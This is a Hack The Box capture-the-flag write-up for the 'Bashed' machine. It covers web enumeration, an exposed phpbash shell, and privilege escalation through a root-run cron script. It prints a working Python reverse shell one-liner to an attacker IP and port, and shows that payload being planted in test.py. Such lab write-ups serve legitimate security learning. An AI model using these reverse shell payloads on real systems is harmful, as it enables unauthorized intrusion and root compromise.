Bashed — Hack The Box [Write-up]

Introduction:

Bashed is a fairly easy machine which focuses mainly on fuzzing and locating important files. As basic access to the crontab is restricted.

Skills Required:

• Basic knowledge of Linux
• Enumerating ports and services

Skills Learned:

• Basic web fuzzing techniques
• Locating recently modified files
• Upgrading normal shell to Fully Interactive Shell

Used Tools:

• Nmap
• Gobuster
• Netcat (nc)

1. SCANNING & ENUMERATION

I will start with nmap and the -A parameter to enable OS detection, version detection, script scanning, and traceroute and append the output to tee command which save the in a file named “nmap” and also show the output on the screen.

nmap scan

I found only port 80 (HTTP) open so let’s navigate through it…

After some navigating through the website i found nothing except the the directory /single.html which shows me what does phpbash do and it’s github link, after searching i found that it is a testing platform for pentesting the website and the website itself contain in-browser bash. This should be useful.

So far we have nothing… let’s enumerate the directories with Gobuster with dir for directory/file brute forcing mode and -u for the url, -w for the brute force directory list, -o to save the output, -x to search for php files and 2>/dev/null to neglect any error and throw it to /dev/null directory

After enumerating the directories I found a lot of interesting directories as /dev, /php, /uploads. Before scanning in any of these directories I try to just access them via the browser. The uploads directory, nothing. The php directory has a sendMail.php script, this may be something. The dev directory has the phpbash script.

2. EXPLOITATION

http://10.10.10.68/dev/phpbash.php is accessible and opened something near to the terminal which means we have a shell :D

After Navigating to the root directory (/) and listing it’s directories i found home directory, go through it i found 2 directories arrexel and scriptmanager go through arrexel and BOOOOOOOOM!!! I found the user.txt flag

3. PRIVILEGE ESCALATION

The results of the gobuster scan also showed me that there was an upload directory, that leads me to believe maybe we can upload files. There are two good options for priv esc scripts that I know of: LinEnum and linuxPrivChecker.

LinEnum is a bash script so it’s fine but linuxPrivChecker is a python script so we want to check weather the system supports python or not by running “which python” and it gives us its path so we are ready to go…

First we want to have a shell on the server so we will listen on our attacking machine with netcat and will connect to it using python script(used to get a reverse shell):

python -c ‘import socket,subprocess,os;s=socket.socket (socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.16.130”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Referance: PayloadAllTheThings

Note: 10.10.16.130 is my ip, you should find yours by typing “ip a” in your machine and taking the ip in the tun0 interface

Listening

Then paste the python script in the website phpbash terminal and press enter.

After connecting run:

python -c ‘import pty;pty.spawn(“/bin/bash”)’

to have an Interactive shell, Referance: Pimp My Shell — 5 Ways to Upgrade a Netcat Shell

Interactive Shell on the server

Once a connection is established, in my new reverse shell in Kali, I continue with some more enumeration.

listing user’s privileges

Scriptmanager user can run commands with no password. Dope. So we can run commands as scriptmanager without being asked for a password once we wrote before it:

sudo -u scriptmanager [Your Command]

So we will try to upgrade our user from arrexel → scriptmanager

sudo -u scriptmanager /bin/bash

or

sudo -i -u scriptmanager

Now that we’re the scriptmanager user, let's take a look and see what we can do with this level of access. To start we'll check the root directory and list it's contents. In here we see that we are able to read, write, and execute in a directory called scripts

What’s interesting here is that scriptmanager owns test.py and root owns test.txt:

Let’s see what’s inside test.py:

It’s pretty simple script that opens the file test.txt in the current directory, writes “testing 123!” and closes the file.

Knowing that the file test.txt is owned by the root, we can assume the root user is executing this script on some schedule. This makes this an easy task for us, because all we need to do is insert a reverse shell into this script and wait for it to be executed as the root user. To do this we will use the same logic as our first reverse shell.

But here we have a problem !!!!!

I was having some weird issues with the arrows, tab completion,vi which was just a hot mess and can’t use neither arrows to move through the text file nor Ctrl+x to save Nano. Before I go any further I try to clear my reverse shell screen, but the clear command isn’t working. Argh. I think my shell isn’t Fully interactive.

After some Googling i found that the answer was there in PayloadAllTheThings but i didn’t notice it there: PayloadAllTheThings

I had to do ctrl+z then type:

stty raw -echo; fg

And then press Enter twice, And to finalize the upgrade to the interactive shell I set the TERM environment variable to xterm-256color

export TERM=xterm-256color

• Getting Back to our Privilege Escalation:

Now Let’s edit our test.py file with:

nano test.py

This is the same script (though it looks prettier now) I used in phpbash to open up this reverse shell. We do not need the python -c or surrounding quotes since now it is a python file.

Modified test.py

After finishing modifying it we must make it executable by typing:

chmod +x test.py

Create a listener with a different port of the previous reverse shell and then execute it…

Let’s check our listener…

BOOOOOOOOOOOOOOOOM!!!!! Now we are root :D

You should find the root flag here:

cat /root/root.txt

Thank you so much for reading and I hope you learned a lot as I did ❤

0x3ashry